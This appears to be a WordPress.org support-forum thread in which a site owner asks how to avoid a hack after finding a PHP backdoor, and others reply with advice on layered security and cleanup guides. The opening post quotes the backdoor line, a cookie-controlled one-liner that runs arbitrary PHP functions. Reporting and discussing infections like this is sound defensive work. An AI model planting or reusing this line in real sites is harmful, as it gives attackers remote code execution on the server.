Support » Plugin: Wordfence Security - Firewall & Malware Scan » Backdoor:PHP/ddksk7

  • Resolved holdportals

    (@holdportals)


    I have wordfence installed and I was hacked,
    got many files with this code inside including wordfence-waf.php
    how can I avoid it? looks like WF is not a complete solution 🙁

    if (isset($_COOKIE[id])) @$_COOKIE[user]($_COOKIE[id]);
    Backdoor:PHP/ddksk7

Viewing 6 replies - 1 through 6 (of 6 total)
  • I hate to break it to you, but there’s no such thing as a “complete security solution”.

    There are many attack vectors, and what is required are multiple layers of protection to handle the myriad attack possibilities. Even then, it is impossible to actually stop (if someone wants in bad enough, they will get in – given time) – the best one can hope for is to make it difficult enough for it not worth a hacker’s time and they move on to another site.

    Having said that, the majority of WP hacks are due to compromised plug-ins, so that’s the first place I’d start investigating if I were you.

    NOTE: I’m not part of WF support, only a long time user. My views are my own.

    Wordfence is far far from a complete solution. As Bluebear says, there is no complete solution.

    You asked how to avoid being hacked? The solution is a team effort that begins with the human factor of you and/or webmaster as coordinator, continues with your hosting provider, extends into your plugin choices and basic website backend management, and again ends with the human factor.

    There is no fully automated software solution. If there was, hacking would not be the huge part of the global economy that it’s become. In my opinion this is due to the odd naivete of the developer community who bring us vulnerable software such as WordPress, but that’s another subject.

    MTN

    But the problem is often far less about direct WordPress vulnerabilities than it is badly-coded, but ubiquitous, plug-ins and themes!

    Thread Starter holdportals

    (@holdportals)

    I am aware of what you guys said. just wanted to know if there is a preferred way to avoid this kind of attack. what other layers of protections do you use?

    Plugin Support wfphil

    (@wfphil)

    Sorry to hear about your situation. Firstly I would like to point you to our Learning Center to guide you through cleaning the infection:

    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Secondly I would like to point you again to our Learning Center where you can learn how to improve your understanding of WordPress security and the steps that you can take to reduce the possibility of being hacked again in the future.

    https://www.wordfence.com/learn/

    Plugin Support wfphil

    (@wfphil)

    Hello,

    I hope the instructions enabled you to successfully clean the infection.

    As you haven’t replied to the instructions that I provided I will assume that the instructions did solve your issue and I will now mark this topic as resolved.

    If however, for whatever reason, you are still experiencing this issue and it is not resolved please respond to the post, which moves it back up the queue, and mark this topic as “not resolved”.

    Thank you.

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Backdoor:PHP/ddksk7’ is closed to new replies.